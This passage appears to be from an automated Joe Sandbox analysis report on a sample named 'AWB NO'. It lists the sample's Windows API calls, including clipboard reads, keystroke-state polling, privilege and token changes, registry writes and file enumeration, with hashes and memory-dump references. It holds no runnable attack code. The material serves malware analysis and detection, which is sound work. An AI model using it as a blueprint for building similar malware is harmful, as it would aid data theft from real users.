                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              APIs
                                                                • Part of subcall function 0042A048: GetStartupInfoW.KERNEL32(?), ref: 0042A052
                                                              • GetCommandLineW.KERNEL32(004BBD38,00000014), ref: 00427F33
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CommandInfoLineStartup
                                                              • String ID:
                                                              • API String ID: 582193876-0
                                                              APIs
                                                                • Part of subcall function 00404D13: FreeLibrary.KERNEL32(00000000,?), ref: 00404D4D
                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,004C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404F6F
                                                                • Part of subcall function 00404CC8: FreeLibrary.KERNEL32(00000000), ref: 00404D02
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load
                                                              • String ID:
                                                              • API String ID: 2391024519-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(01050000,00000000,00000001,00000000,?,?,?,00421013,?), ref: 0042598F
                                                                • Part of subcall function 0042A408: GetModuleFileNameW.KERNEL32(00000000,004C43BA,00000104,?,00000001,00000000), ref: 0042A49A
                                                                • Part of subcall function 004232DF: ExitProcess.KERNEL32 ref: 004232EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: AllocateExitFileHeapModuleNameProcess
                                                              • String ID:
                                                              • API String ID: 1715456479-0
                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00405807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405D76
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,004C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404FDE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004209F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID:
                                                              • API String ID: 82841172-0
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0043E16B,?,?,00000000), ref: 00405DBF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              APIs
                                                              • GetLastError.KERNEL32(00000002,00000000), ref: 0046D46A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 010322B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18136010399.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000), ref: 004233CA
                                                                • Part of subcall function 0042A764: EncodePointer.KERNEL32(0042A730,004BBE68,00000008,00434D5C), ref: 0042A769
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0042A0E0
                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042A0F4
                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042A107
                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042A11A
                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042A12D
                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0042A140
                                                              • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0042A153
                                                              • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0042A166
                                                              • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0042A179
                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0042A18C
                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0042A19F
                                                              • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0042A1B2
                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0042A1C5
                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0042A1D8
                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0042A1EB
                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0042A1FE
                                                              • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0042A211
                                                              • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0042A224
                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0042A237
                                                              • GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 0042A24A
                                                              • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0042A25D
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0042A270
                                                              • GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 0042A283
                                                              • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0042A296
                                                              • GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 0042A2A9
                                                              • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0042A2BC
                                                              • GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 0042A2CF
                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 0042A2E2
                                                              • GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 0042A2F5
                                                              • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0042A308
                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0042A31B
                                                              • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0042A32E
                                                              • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleExW), ref: 0042A341
                                                              • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandleW), ref: 0042A354
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: AddressProc$EncodePointer$HandleModule
                                                              • String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetFileInformationByHandleExW$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTickCount64$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetFileInformationByHandleW$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$WaitForThreadpoolTimerCallbacks$kernel32.dll
                                                              • API String ID: 2375030495-2934716456
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CE50
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CE91
                                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0048CED6
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CF00
                                                              • SendMessageW.USER32 ref: 0048CF29
                                                              • GetKeyState.USER32(00000011), ref: 0048CFC2
                                                              • GetKeyState.USER32(00000009), ref: 0048CFCF
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CFE5
                                                              • GetKeyState.USER32(00000010), ref: 0048CFEF
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048D018
                                                              • SendMessageW.USER32 ref: 0048D03F
                                                              • SendMessageW.USER32(?,00001030,?,0048B602), ref: 0048D145
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048D15B
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048D16E
                                                              • SetCapture.USER32(?), ref: 0048D177
                                                              • ClientToScreen.USER32(?,?), ref: 0048D1DC
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048D1E9
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048D203
                                                              • ReleaseCapture.USER32 ref: 0048D20E
                                                              • GetCursorPos.USER32(?), ref: 0048D248
                                                              • ScreenToClient.USER32(?,?), ref: 0048D255
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D2B1
                                                              • SendMessageW.USER32 ref: 0048D2DF
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D31C
                                                              • SendMessageW.USER32 ref: 0048D34B
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D36C
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D37B
                                                              • GetCursorPos.USER32(?), ref: 0048D39B
                                                              • ScreenToClient.USER32(?,?), ref: 0048D3A8
                                                              • GetParent.USER32(?), ref: 0048D3C8
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D431
                                                              • SendMessageW.USER32 ref: 0048D462
                                                              • ClientToScreen.USER32(?,?), ref: 0048D4C0
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D4F0
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D51A
                                                              • SendMessageW.USER32 ref: 0048D53D
                                                              • ClientToScreen.USER32(?,?), ref: 0048D58F
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D5C3
                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048D65F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                              • String ID: @GUI_DRAGID$F$prL
                                                              • API String ID: 3429851547-935584803
                                                              APIs
                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0048873F
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: %d/%02d/%02d
                                                              • API String ID: 3850602802-328681919
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,?), ref: 00404A3D
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043DA8E
                                                              • IsIconic.USER32(?), ref: 0043DA97
                                                              • ShowWindow.USER32(?,00000009), ref: 0043DAA4
                                                              • SetForegroundWindow.USER32(?), ref: 0043DAAE
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043DAC4
                                                              • GetCurrentThreadId.KERNEL32 ref: 0043DACB
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043DAD7
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043DAE8
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043DAF0
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043DAF8
                                                              • SetForegroundWindow.USER32(?), ref: 0043DAFB
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043DB10
                                                              • keybd_event.USER32(00000012,00000000), ref: 0043DB1B
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043DB25
                                                              • keybd_event.USER32(00000012,00000000), ref: 0043DB2A
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043DB33
                                                              • keybd_event.USER32(00000012,00000000), ref: 0043DB38
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043DB42
                                                              • keybd_event.USER32(00000012,00000000), ref: 0043DB47
                                                              • SetForegroundWindow.USER32(?), ref: 0043DB4A
                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0043DB71
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              APIs
                                                                • Part of subcall function 00458CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00458D0D
                                                                • Part of subcall function 00458CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458D3A
                                                                • Part of subcall function 00458CC3: GetLastError.KERNEL32 ref: 00458D47
                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004588ED
                                                              • CloseHandle.KERNEL32(?), ref: 004588FE
                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00458915
                                                              • GetProcessWindowStation.USER32 ref: 0045892E
                                                              • SetProcessWindowStation.USER32(00000000), ref: 00458938
                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00458952
                                                                • Part of subcall function 00458713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458851), ref: 00458728
                                                                • Part of subcall function 00458713: CloseHandle.KERNEL32(?,?,00458851), ref: 0045873A
                                                              Strings
                                                              Similarity
                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue
                                                              • String ID: $default$winsta0
                                                              • API String ID: 3576815822-1027155976
                                                              APIs
                                                              • OpenClipboard.USER32(0048F910), ref: 00474284
                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00474292
                                                              • GetClipboardData.USER32(0000000D), ref: 0047429A
                                                              • CloseClipboard.USER32 ref: 004742A6
                                                              • GlobalLock.KERNEL32(00000000), ref: 004742C2
                                                              • CloseClipboard.USER32 ref: 004742CC
                                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 004742E1
                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 004742EE
                                                              • GetClipboardData.USER32(00000001), ref: 004742F6
                                                              • GlobalLock.KERNEL32(00000000), ref: 00474303
                                                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00474337
                                                              • CloseClipboard.USER32 ref: 00474447
                                                              Similarity
                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                              • String ID:
                                                              • API String ID: 3222323430-0
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480BDE
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 00480C4C
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480C94
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480D1D
                                                              • RegCloseKey.ADVAPI32(?), ref: 0048103D
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0048104A
                                                              Strings
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 536824911-966354055
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,77888FB0,?,00000000), ref: 0046F221
                                                              • GetFileAttributesW.KERNEL32(?), ref: 0046F25F
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0046F279
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0046F291
                                                              • FindClose.KERNEL32(00000000), ref: 0046F29C
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F2B8
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F308
                                                              • SetCurrentDirectoryW.KERNEL32(004BA5A0), ref: 0046F326
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F330
                                                              • FindClose.KERNEL32(00000000), ref: 0046F33D
                                                              • FindClose.KERNEL32(00000000), ref: 0046F34F
                                                              Strings
                                                              Similarity
                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1409584000-438819550
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$OaA$PJJ$UCP)$UTF)$UTF16)
                                                              • API String ID: 0-887578391
                                                              APIs
                                                                • Part of subcall function 0045874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00458766
                                                                • Part of subcall function 0045874A: GetLastError.KERNEL32(?,0045822A,?,?,?), ref: 00458770
                                                                • Part of subcall function 0045874A: GetProcessHeap.KERNEL32(00000008,?,?,0045822A,?,?,?), ref: 0045877F
                                                                • Part of subcall function 0045874A: HeapAlloc.KERNEL32(00000000,?,0045822A,?,?,?), ref: 00458786
                                                                • Part of subcall function 0045874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0045879D
                                                                • Part of subcall function 004587E7: GetProcessHeap.KERNEL32(00000008,00458240,00000000,00000000,?,00458240,?), ref: 004587F3
                                                                • Part of subcall function 004587E7: HeapAlloc.KERNEL32(00000000,?,00458240,?), ref: 004587FA
                                                                • Part of subcall function 004587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00458240,?), ref: 0045880B
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0045825B
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0045828F
                                                              • GetLengthSid.ADVAPI32(?), ref: 004582A0
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 004582DD
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004582F9
                                                              • GetLengthSid.ADVAPI32(?), ref: 00458316
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00458325
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0045832C
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0045834D
                                                              • CopySid.ADVAPI32(00000000), ref: 00458354
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00458385
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004583AB
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004583BF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                                              • String ID:
                                                              • API String ID: 1795222879-0
                                                              • Opcode ID: 27d3b1d758ce327bd6ff960f42808705922d37cc0f2b3be1dedc4948f6e72ee5
                                                              • Instruction ID: d5b260a28bbd50cd38a870094945b07d29d7a3b63504d6cb352bb9851184e42d
                                                              • Opcode Fuzzy Hash: 27d3b1d758ce327bd6ff960f42808705922d37cc0f2b3be1dedc4948f6e72ee5
                                                              • Instruction Fuzzy Hash: AE616C71900209AFDF00DFA1DC44AAEBBB9FF04705F14856EFC15A6292DF399A19CB64
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,77888FB0,?,00000000), ref: 0046F37E
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0046F3D9
                                                              • FindClose.KERNEL32(00000000), ref: 0046F3E4
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F400
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F450
                                                              • SetCurrentDirectoryW.KERNEL32(004BA5A0), ref: 0046F46E
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F478
                                                              • FindClose.KERNEL32(00000000), ref: 0046F485
                                                              • FindClose.KERNEL32(00000000), ref: 0046F497
                                                                • Part of subcall function 004645C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004645DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 2640511053-438819550
                                                              • Opcode ID: ec6b9d9e702f045fbfb62a8a4d4bf93f4726aadb3ab887182078068f471a89aa
                                                              • Instruction ID: b075de1a3a6116e48bb9cf245284ec928ecdd711139cb2480e8db77f57688df7
                                                              • Opcode Fuzzy Hash: ec6b9d9e702f045fbfb62a8a4d4bf93f4726aadb3ab887182078068f471a89aa
                                                              • Instruction Fuzzy Hash: 7031C6716011196ACF10AF64FC84ADF77AC9F45364F60417BE890D22A0EB39DA89CB6D
                                                              APIs
                                                                • Part of subcall function 004810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00480038,?,?), ref: 004810BC
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480737
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004807D6
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0048086E
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480AAD
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00480ABA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper
                                                              • String ID:
                                                              • API String ID: 1724414362-0
                                                              • Opcode ID: 5df0f647d61c14a08bf25573f9023f66fe77a698abf6e36ad657de7376410893
                                                              • Instruction ID: f0685776b061da3febb4d5759a9ab82e159331f6864d6f996855a4051f4b1c00
                                                              • Opcode Fuzzy Hash: 5df0f647d61c14a08bf25573f9023f66fe77a698abf6e36ad657de7376410893
                                                              • Instruction Fuzzy Hash: 9CE16F71214210AFCB14EF29C881E6FBBE4EF89714B04886EF449D72A2DB34ED45CB55
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00460241
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 004602C2
                                                              • GetKeyState.USER32(000000A0), ref: 004602DD
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 004602F7
                                                              • GetKeyState.USER32(000000A1), ref: 0046030C
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00460324
